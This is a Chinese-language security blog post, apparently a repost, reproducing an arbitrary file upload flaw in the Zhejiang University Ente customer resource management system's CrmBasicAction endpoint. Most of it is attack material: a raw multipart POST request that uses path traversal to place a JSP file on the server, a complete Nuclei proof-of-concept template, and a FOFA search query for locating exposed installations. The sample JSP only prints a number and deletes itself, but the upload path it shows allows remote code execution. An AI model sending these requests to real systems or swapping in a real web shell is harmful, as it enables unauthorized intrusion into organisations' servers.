【漏洞复现】浙大恩特客户资源管理系统 crmbasicaction 任意文件上传

admin 2024年1月16日17:49:32评论25 views字数 2043阅读6分48秒阅读模式

免责声明

【漏洞复现】浙大恩特客户资源管理系统 crmbasicaction 任意文件上传

此内容仅供技术交流与学习,请勿用于未经授权的场景。请遵循相关法律与道德规范。任何因使用本文所述技术而引发的法律责任,与本文作者及发布平台无关。如有内容争议或侵权,请及时联系我们。谢谢!

【漏洞复现】浙大恩特客户资源管理系统 crmbasicaction 任意文件上传

【漏洞复现】浙大恩特客户资源管理系统 crmbasicaction 任意文件上传

漏洞概述

【漏洞复现】浙大恩特客户资源管理系统 crmbasicaction 任意文件上传

        浙大恩特客户资源管理系统中的crmbasicaction接口存在安全漏洞,允许攻击者向系统上传任意恶意JSP文件,从而可能导致潜在的远程执行代码攻击。该漏洞可能会对系统的完整性和安全性产生严重影响。

【漏洞复现】浙大恩特客户资源管理系统 crmbasicaction 任意文件上传

【漏洞复现】浙大恩特客户资源管理系统 crmbasicaction 任意文件上传

漏洞复现

【漏洞复现】浙大恩特客户资源管理系统 crmbasicaction 任意文件上传

POST /entsoft/CrmBasicAction.entcrm?method=zipFileUpload&c_transModel=old HTTP/1.1Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.2657.7 Safari/537.36Content-Length: 267Accept-Encoding: gzipConnection: closeContent-Type: multipart/form-data; boundary=0rwysvgvy7rxv790mpju--0rwysvgvy7rxv790mpjuContent-Disposition: form-data; name="file"; filename="../../mqh8qxe3cy.jsp"Content-Type: application/zip<% out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>--0rwysvgvy7rxv790mpju--

【漏洞复现】浙大恩特客户资源管理系统 crmbasicaction 任意文件上传

【漏洞复现】浙大恩特客户资源管理系统 crmbasicaction 任意文件上传

【漏洞复现】浙大恩特客户资源管理系统 crmbasicaction 任意文件上传

NUCLEI POC

【漏洞复现】浙大恩特客户资源管理系统 crmbasicaction 任意文件上传

id: zhedaente-entsoft-CrmBasicAction-uploadinfo:  name: 浙大恩特客户资源管理系统-crmbasicaction-任意文件上传  author: rain  severity: critical  metadata:    fofa-query: title="欢迎使用浙大恩特客户资源管理系统" || body="script/Ent.base.js" || app="浙大恩特客户资源管理系统"variables:  filename: "{{to_lower(rand_base(10))}}"  boundary: "{{to_lower(rand_base(20))}}"http:  - raw:      - |        POST /entsoft/CrmBasicAction.entcrm?method=zipFileUpload&c_transModel=old HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.2657.7 Safari/537.36        Connection: close        Content-Type: multipart/form-data; boundary={{boundary}}        Accept-Encoding: gzip        --{{boundary}}        Content-Disposition: form-data; name="file"; filename="../../{{filename}}.jsp"        Content-Type: application/zip        <% out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>        --{{boundary}}--      - |+        GET /enterdoc/dao{{filepath}}{{filename}}.jsp HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.2657.7 Safari/537.36        Content-Length: 0        Accept-Encoding: gzip, deflate        Connection: close    extractors:      - type: regex        name: filepath        part: body        internal: true        group: 1        regex:          - '(/d+/)'    matchers:      - type: dsl        dsl:          - "status_code_2 == 200 && contains(body_2,'12321')"

【漏洞复现】浙大恩特客户资源管理系统 crmbasicaction 任意文件上传

原文始发于微信公众号(知黑守白):【漏洞复现】浙大恩特客户资源管理系统 crmbasicaction 任意文件上传

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月16日17:49:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】浙大恩特客户资源管理系统 crmbasicaction 任意文件上传https://cn-sec.com/archives/2399732.html

发表评论

匿名网友 填写信息